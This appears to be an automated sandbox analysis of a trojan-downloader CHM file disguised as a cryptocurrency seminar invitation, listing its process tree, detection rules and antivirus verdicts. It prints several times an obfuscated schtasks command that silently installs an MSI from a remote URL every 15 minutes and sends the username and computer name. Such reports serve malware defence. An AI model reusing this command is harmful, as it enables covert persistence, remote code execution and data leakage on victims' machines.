Invitation To Attend Cryptocurrency Awareness Seminar.chm| Category | Machine | Started | Completed |
|---|---|---|---|
| FILE | s1_win7_x6401 | Sept. 4, 2023, 3:04 p.m. | Sept. 4, 2023, 3:06 p.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "WiFtPZOzd" "C:\Users\test22\AppData\Local\Temp\Invitation To Attend Cryptocurrency Awareness Seminar.chm"
2576-
hh.exe "C:\Windows\hh.exe" C:\Users\test22\AppData\Local\Temp\Invitation To Attend Cryptocurrency Awareness Seminar.chm
2664-
schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 15 /tn GoogleService /tr "%coMSPec% /c s^ta^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://da^sh^o^nl^in^e^c^l^u^b.^c^o^m/C^V^B^N/^m^zx.p^hp^?^p^i=%username%*%computername% /^q^n ^/^norestart" /f
2880
-
-
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
| IP Address | Status | Action |
|---|---|---|
| No hosts contacted. | ||
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
| registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
| cmdline | schtasks /create /sc minute /mo 15 /tn GoogleService /tr "%coMSPec% /c s^ta^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://da^sh^o^nl^in^e^c^l^u^b.^c^o^m/C^V^B^N/^m^zx.p^hp^?^p^i=%username%*%computername% /^q^n ^/^norestart" /f |
| cmdline | "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 15 /tn GoogleService /tr "%coMSPec% /c s^ta^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://da^sh^o^nl^in^e^c^l^u^b.^c^o^m/C^V^B^N/^m^zx.p^hp^?^p^i=%username%*%computername% /^q^n ^/^norestart" /f |
| description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
| description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
| description | (no description) | rule | DebuggerHiding__Thread | ||||||
| description | (no description) | rule | DebuggerHiding__Active | ||||||
| description | (no description) | rule | ThreadControl__Context | ||||||
| description | (no description) | rule | SEH__vectored | ||||||
| description | Checks if being debugged | rule | anti_dbg | ||||||
| description | Bypass DEP | rule | disable_dep | ||||||
| cmdline | schtasks /create /sc minute /mo 15 /tn GoogleService /tr "%coMSPec% /c s^ta^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://da^sh^o^nl^in^e^c^l^u^b.^c^o^m/C^V^B^N/^m^zx.p^hp^?^p^i=%username%*%computername% /^q^n ^/^norestart" /f |
| cmdline | "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 15 /tn GoogleService /tr "%coMSPec% /c s^ta^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://da^sh^o^nl^in^e^c^l^u^b.^c^o^m/C^V^B^N/^m^zx.p^hp^?^p^i=%username%*%computername% /^q^n ^/^norestart" /f |
| cmdline | schtasks /create /sc minute /mo 15 /tn GoogleService /tr "%coMSPec% /c s^ta^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://da^sh^o^nl^in^e^c^l^u^b.^c^o^m/C^V^B^N/^m^zx.p^hp^?^p^i=%username%*%computername% /^q^n ^/^norestart" /f |
| cmdline | "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 15 /tn GoogleService /tr "%coMSPec% /c s^ta^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://da^sh^o^nl^in^e^c^l^u^b.^c^o^m/C^V^B^N/^m^zx.p^hp^?^p^i=%username%*%computername% /^q^n ^/^norestart" /f |
| ALYac | Generic.Agent.CHM.1.489D76A5 |
| Sangfor | Trojan.Generic-Script.Save.aadd533b |
| Symantec | Trojan.Gen.NPE |
| ESET-NOD32 | HTML/TrojanDownloader.Agent.NKU |
| Kaspersky | HEUR:Trojan.Script.Generic |
| BitDefender | Generic.Agent.CHM.1.489D76A5 |
| MicroWorld-eScan | Generic.Agent.CHM.1.489D76A5 |
| Rising | Trojan.MouseJack/HTML!1.BE26 (CLASSIC) |
| Emsisoft | Generic.Agent.CHM.1.489D76A5 (B) |
| DrWeb | Exploit.ActiveX.23 |
| VIPRE | Generic.Agent.CHM.1.489D76A5 |
| McAfee-GW-Edition | Artemis!Trojan |
| FireEye | Generic.Agent.CHM.1.489D76A5 |
| GData | Generic.Agent.CHM.1.489D76A5 |
| Arcabit | Generic.Agent.CHM.1.489D76A5 |
| ZoneAlarm | HEUR:Trojan.Script.Generic |
| AhnLab-V3 | Downloader/HTML.Generic.S2220 |
| MAX | malware (ai score=83) |
| Tencent | Win32.Trojan-Downloader.Ader.Vmhl |
| Fortinet | HTML/Agent.NKU!tr.dldr |